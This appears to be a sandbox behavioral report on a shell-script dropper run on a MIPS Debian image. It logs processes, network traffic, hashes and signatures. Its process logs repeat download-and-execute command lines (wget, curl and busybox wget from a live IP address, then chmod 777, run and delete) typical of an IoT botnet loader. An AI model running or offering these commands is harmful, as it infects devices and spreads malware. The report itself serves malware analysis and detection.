[chmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh
[./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/rm
[rm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/usr/bin/wget
[wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/chmod
[chmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy
[./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/rm
[rm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/usr/bin/wget
[wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/chmod
[chmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5
[./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/rm
[rm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/usr/bin/wget
[wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/chmod
[chmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk
[./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/rm
[rm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/usr/bin/wget
[wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/chmod
[chmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m
[./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/rm
[rm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/usr/bin/wget
[wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/chmod
[chmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q
[./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/rm
[rm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/usr/bin/wget
[wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/chmod
[chmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM
[./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/rm
[rm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/usr/bin/wget
[wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/chmod
[chmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv
[./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/rm
[rm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/usr/bin/wget
[wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/chmod
[chmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy
[./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/rm
[rm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/usr/bin/wget
[wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/chmod
[chmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj
[./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/rm
[rm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/usr/bin/wget
[wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/chmod
[chmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI
[./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/rm
[rm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/usr/bin/wget
[wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/chmod
[chmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh
[./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/rm
[rm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/usr/bin/wget
[wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/792-1-0xb66c4000-0xb66d5044-memory.dmp
memory/844-2-0xb674a000-0xb675b044-memory.dmp
memory/859-3-0xb676c000-0xb677d044-memory.dmp
memory/865-4-0xb66f1000-0xb6702044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-24 02:06
Reported
2024-11-24 02:09
Platform
debian9-mipsbe-20240729-en
Max time kernel
119s
Max time network
122s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ | /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ | N/A |
| N/A | /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT | /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT | N/A |
| N/A | /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s | /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s | N/A |
| N/A | /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 | /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 | N/A |
| N/A | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | N/A |
| N/A | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | N/A |
| N/A | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | N/A |
| N/A | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | N/A |
| N/A | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | N/A |
| N/A | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | N/A |
| N/A | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | N/A |
| N/A | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | N/A |
| N/A | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | N/A |
| N/A | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | N/A |
| N/A | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | N/A |
| N/A | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | N/A |
| N/A | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | N/A |
| N/A | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | N/A |
| N/A | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | N/A |
| N/A | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | N/A |
| N/A | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | N/A |
| N/A | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | N/A |
| N/A | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | N/A |
| N/A | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | N/A |
| N/A | /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 | /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 | N/A |
| N/A | /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ | /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ | N/A |
| N/A | /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT | /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT | N/A |
| N/A | /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s | /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | /usr/bin/curl | N/A |
Processes
/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
[/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/bin/chmod
[chmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ
[./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/bin/rm
[rm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/bin/chmod
[chmod 777 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT
[./7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/bin/rm
[rm 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/usr/bin/wget
[wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/bin/chmod
[chmod 777 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s
[./3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/bin/rm
[rm 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/usr/bin/wget
[wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/bin/chmod
[chmod 777 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4
[./RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/bin/rm
[rm RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/usr/bin/wget
[wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/chmod
[chmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk
[./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/rm
[rm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/usr/bin/wget
[wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
